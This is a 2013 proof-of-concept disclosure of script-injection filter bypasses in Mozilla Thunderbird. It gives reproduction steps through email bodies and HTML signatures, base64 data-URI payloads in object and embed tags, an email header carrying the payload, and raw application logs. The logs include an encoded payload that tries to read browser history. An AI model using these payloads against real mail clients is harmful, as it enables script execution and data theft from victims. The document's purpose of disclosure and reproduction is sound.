Proof of Concept (PoC):
=======================
The filter bypass & persistent script code inject web vulnerabilities can be exploited by remote attackers without privileged user account 
or direct user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.

Proof of Concept #1

a) Create a new email message
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.


Proof of Concept #2

a) Goto Tools and then Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Write" to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.


Proof of Concept #3

a) Create a new text file on your desktop (local computer) and insert the POC payload in it and save it as test.html (HTML)
b) Goto Tools and then Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'  
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on Write and you should be able to see the Javascript popup proving the existence of this vulnerability.


Payload #1

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24t
UE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"></object>


Payload #2

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIk1vemlsbGEt
VGh1bmRlcmJpcmQtU2NyaXB0LUNvZGUtSW5qZWN0aW9uLVBPQy1BdGVlcS1LaGFuIik7PC9zY3Jp
cHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


1.3 

POC Technical Description:

Here, we used the data URI payload as a value assigned to the ‘data’ attribute of the ‘object’ tag. The <object> tag is used to include objects
such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The ‘data’ attribute of the object tag defines a URL that refers to the
object’s data. Data in the "data:" URI is encoded as a base64 string:

Base64-encoded payload: PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=

Base64-decoded payload: <script>alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan");</script>

When the browser loads the object tag, it loads an object (in our case, it’s a javascript) assigned to its data attribute. This causes execution 
of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload. 


1.4

Email Header showing the hidden malicious payload

Message-ID: <5195AABB.9000409@ccure.it>
Date: Fri, 17 May 2013 08:57:47 +0500
From: Ateeq Khan <ateeq@ccure.it>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130509 Thunderbird/17.0.6
MIME-Version: 1.0
To: ateeq <ateeq@ccure.it>
Subject: Test
X-Enigmail-Version: 1.5.1
Content-Type: multipart/alternative;
 boundary="------------070707070308040102070208"
X-Provags-ID: V02:K0:x1sxyB72JjArK0t7OpMGlUdnbY0vjneQvJdkX/twIfw
 QgzRaY5JN/SeFJ/fl2yULg+LJCKojYYGFR/8wrcS9hv6B6WWrN
 mur6d1IsxEn2D2kZt5fQ3tk8Z1qDiEpN5C7vrtOyEFAMJR3NHg
 jsL6elL9oxDkDRj1rYWvipndH1vonoPT3kjbcmuPsEZwYZ0JkL
 BjvA5CQE3qDMPgd5nzdT8SqKBRrj9u7m/irxCWHeJcnAG0XBnK
 txadh05EhpYjzrsz2kd+EyQe8ABh9F+yHQs6PBgIJeMDhm3EmY
 KPDb5TDHAsnDSD7e3jSaj1t/jhHWc4OA+Okkw+PsyBasdNvzw=
 =
X-UI-Junk: AutoNotJunk -999 (UWL);
  V01:9SSPrMSv:3OJduITnBKJW2sO9FDRIJW8REKQH86F2DhxLUWcUUFzS1g0JhJ7
  GgRkniiwfqYstxpjhSj957gz/8tEx07A4XeXZriK0TD0WhS1DXezTz/TtZsDYDEh
  hoWYOFl3bb5yC2QDLQsFZpUW8W11Q1ueL83Jxhvv1UmeH1zGnYFLHhAFOpzxH4jN
  652vXWc8dXjmX/WjTrvcI6NDjWdTTTfnDoO2PVFxLR+Tspu5HEv+SDuyrKv18Pei
  ogK+aeYsHnGw+Sv4tyfEE3I/nLbDefudGihBnld6s0loLxOOAGeIYxOeZ4Je+v0h
  MH9Y6ICIP7qvG/CkWt1PYQDzeNRPMANzlOgD/c//0kMjpKd6GwFWZIgfLyEFGGGA
  5ghpw5skyHXrAcf+FBq4ayJpL2UIfGeghWw==
X-Nemesis-Spam: whitelist
Envelope-To: ateeq@ccure.it

This is a multi-part message in MIME format.
--------------070707070308040102070208
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

-- --------------070707070308040102070208 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit <html> <head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> </head> <body text="#000000" bgcolor="#FFFFFF"> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4= "></object> <div class="moz-signature">-- <br> <script>alert(1)</script></div> </body> </html> --------------070707070308040102070208-- 1.5 Interesting Raw Application Logs captured during the entire process of testing: (4fbc.3828): Break instruction exception - code 80000003 (first chance) eax=fff82000 ebx=00000000 ecx=00000000 edx=7792f85a esi=00000000 edi=00000000 eip=778a000c esp=0ffffd94 ebp=0ffffdc0 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!DbgBreakPoint: 778a000c cc int 3 0:040> g [JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498 @resource:///components/nsSearchService.js:3476 _adjustAcItem@chrome://messenger/content/webSearch.xml:42 @chrome://messenger/content/webSearch.xml:22 " {file: "resource:///components/nsSearchService.js" line: 2499}] [JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression: ["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"] " {file: "resource:///modules/gloda/log4moz.js" line: 687}] 2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression: ["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"] [JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression: ["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"] " {file: "resource:///modules/gloda/log4moz.js" line: 687}] 2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression: ["<EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"] [JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)" location: "JS frame :: chrome://editor/content/ComposerCommands.js :: <TOP_LEVEL> :: line 2790" data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}] [JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/folderDisplay.js" line: 2342}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/folderDisplay.js" line: 2342}] [JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}] [JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}] [JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}] [JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messenger.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messenger.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/folderDisplay.js" line: 1621}] [JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://global/content/bindings/toolbar.xml" line: 276}] "chrome://global/content/bindings/general.xml" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] No chrome package registered for chrome://navigator/content/navigator.xul [JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64, PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9 yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYW dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] No chrome package registered for chrome://navigator/content/navigator.xul [JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64, PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9y ICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYWdl ci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}] [JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)" location: "JS frame :: chrome://editor/content/ComposerCommands.js :: <TOP_LEVEL> :: line 2790" data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}] [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] Security Error: Content at moz-nullprincipal:{37db781d-d6d3-44bb-ade4-a79dcc63c0dd} may not load or link to about:blank. Security Error: Content at moz-nullprincipal:{44bab10a-4bd8-4cfb-a519-eb2535344039} may not load or link to about:blank [JavaScript Error: "[Exception... "'DB failed getting form autocomplete values' when calling method: [nsIFormAutoComplete::autoCompleteSearch]" nsresult: "0x8057001e (NS_ERROR_XPC_JS_THREW_STRING)" location: "<unknown>" data: no]"] [JavaScript Error: "aSubject.popup is undefined" {file: "resource:///modules/glodaWebSearch.js" line: 68}] [JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}] [JavaScript Warning: "Unknown property 'x'. Declaration dropped." {file: "data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D" line: 1] [JavaScript Error: "GenericSendMessage FAILED: [Exception... "Component returned failure code: 0x8055311a [nsIMsgCompose.SendMsg]" nsresult: "0x8055311a (<unknown>)" location: "JS frame :: chrome://messenger/content/messengercompose/MsgComposeCommands.js :: GenericSendMessage :: line 2814" data: no]" {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 2817}] "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}] [JavaScript Warning: "Use of attributes' nodeValue attribute is deprecated. Use value instead." {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 3996}] Security Error: Content at moz-nullprincipal:{549c3f5a-560d-4469-9b0f-09f598998b0b} may not load or link to about:blank. Security Error: Content at moz-nullprincipal:{63e416e7-9cc4-458f-b93d-882bb2ad9121} may not load or link to about:blank. [JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://global/content/bindings/general.xml" line: 0}] [JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498 @resource:///components/nsSearchService.js:3476 _adjustAcItem@chrome://messenger/content/webSearch.xml:42 @chrome://messenger/content/webSearch.xml:22 [JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}] stylesheet was loaded successfully as text/plain even though it should have been.